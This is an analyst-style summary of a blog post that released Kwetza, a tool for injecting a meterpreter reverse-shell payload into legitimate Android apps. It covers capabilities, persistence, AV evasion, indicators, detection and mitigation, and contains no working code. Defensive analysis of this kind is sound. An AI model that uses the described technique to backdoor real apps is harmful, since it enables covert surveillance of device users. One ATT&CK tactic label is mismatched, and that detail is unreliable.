Full Report
This blog post describes a method for backdooring Android executables. After describing the manual step, I will show how to do the same with a new tool, Kwetza, that I’m releasing today. Infecting Android applications provides a great way to determine the impact and affect of the malicious activities we see in the wild, from ransomware to practical jokes. This not only provides you with an entry point onto user devices, but also allows you to see how devices, users and anti-virus behave in these situations.
Analysis Summary
# Tool/Technique: Kwetza
## Overview
Kwetza is a newly released tool designed to automatically backdoor existing legitimate Android applications (APKs) by injecting a malicious payload. Its purpose is to infect benign applications, allowing an attacker to gain remote access to a victim's device (e.g., webcam, location, SMS) when the infected application is executed, while ensuring the application still functions normally to avoid victim detection.
## Technical Details
- Type: Tool
- Platform: Android
- Capabilities: Automates the process of injecting a malicious payload (like a reverse shell) into an existing Android APK, manipulating the application's structure (e.g., squeezing payload functionality into a single class) and potentially injecting additional dangerous permissions.
- First Seen: October 03, 2016 (Date of article publication)
## MITRE ATT&CK Mapping
The core activity described is gaining unauthorized access via a backdoored application executing code on the victim's machine.
- **TA0005 - Privilege Escalation**
- T1548.002 - Abuse Elevation Control Mechanism: If the tool is used to inject permissions beyond the original application's scope.
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol: The resulting meterpreter session uses TCP for C2.
- **TA0009 - Collection**
- T1005 - Data from Local System: Used to access SMS, location, and camera data via the injected payload.
## Functionality
### Core Capabilities
- **Payload Injection:** Injects a payload (demonstrated using `android/meterpreter/reverse_tcp` generated via `msfvenom`) into a target APK.
- **Code Squeezing/Refactoring:** Automates the manual step of consolidating the payload's functionality into a single Java class (`AssistActivity.java`) within the target application structure.
- **Manifest Manipulation (Implicit/Optional):** Can be instructed to inject additional dangerous permissions into the target application's `AndroidManifest.xml`.
- **Entry Point Hooking (Automated):** Automates identifying and targeting the application's launch activity to ensure the payload executes upon application launch.
### Advanced Features
- **Customization:** Offers flexibility in terms of injected permissions and customizable template representation of payloads compared to similar existing tools.
- **Persistence:** The resulting meterpreter session can persist even when the Android device is locked or the application is in the background.
## Indicators of Compromise
(Note: Indicators generated here are based on the *example payload* used to demonstrate Kwetza's capability, not Kwetza itself.)
- File Hashes: N/A (Kwetza is an injector tool, not the malware artifact itself)
- File Names: Infected APKs will retain the original application's name but carry the hidden payload. Example payload used: `beard.apk`.
- Registry Keys: N/A (Native Android environment)
- Network Indicators: The tool requires a defined LHOST and LPORT for the injected payload listener (e.g., LHOST=`10.42.0.211`, LPORT=`4444` in tests).
- Behavioral Indicators: Execution of the infected application leads to an outbound reverse shell connection. Persistence of the connection when the app is backgrounded.
## Associated Threat Actors
This tool was released by the author(s) for research purposes ("to determine the impact and affect of the malicious activities"). No specific established threat actor group is associated with its use in the context provided.
## Detection Methods
- **Signature-based detection:** The example payload (`beard.apk`) was detected by 17/41 AV vendors pre-injection, suggesting detection signatures exist for common MSF payloads. Kwetza's automation is intended to potentially bypass these by embedding the payload differently.
- **Behavioral detection:** Monitoring outbound network connections initiated by legitimate applications to unusual external IPs/ports, especially immediately upon launch. Monitoring persistence checks (session remaining active after the app moves to the background).
- **YARA rules:** Not specified, but YARA rules targeting the "squeezed" single-class structure or unusual resource embedding might be effective against Kwetza-infected applications.
## Mitigation Strategies
- **Prevention:** Scrutinize the permissions requested by legitimate applications during installation/updates. Be wary of applications that suddenly request new, seemingly unrelated permissions (e.g., a game asking for SMS/Camera).
- **Hardening:** Use application sandboxing or application vetting processes if deploying internal enterprise apps. Utilize tools that monitor or prevent unauthorized permission changes or runtime injections.
## Related Tools/Techniques
- **msfvenom:** Used to generate the initial raw malicious payload (`android/meterpreter/reverse_tcp`).
- **apktool:** A necessary dependency used by Kwetza to decompile/recompile the APK structure.
- Backdoor-APK (Mentioned as a similar automation attempt).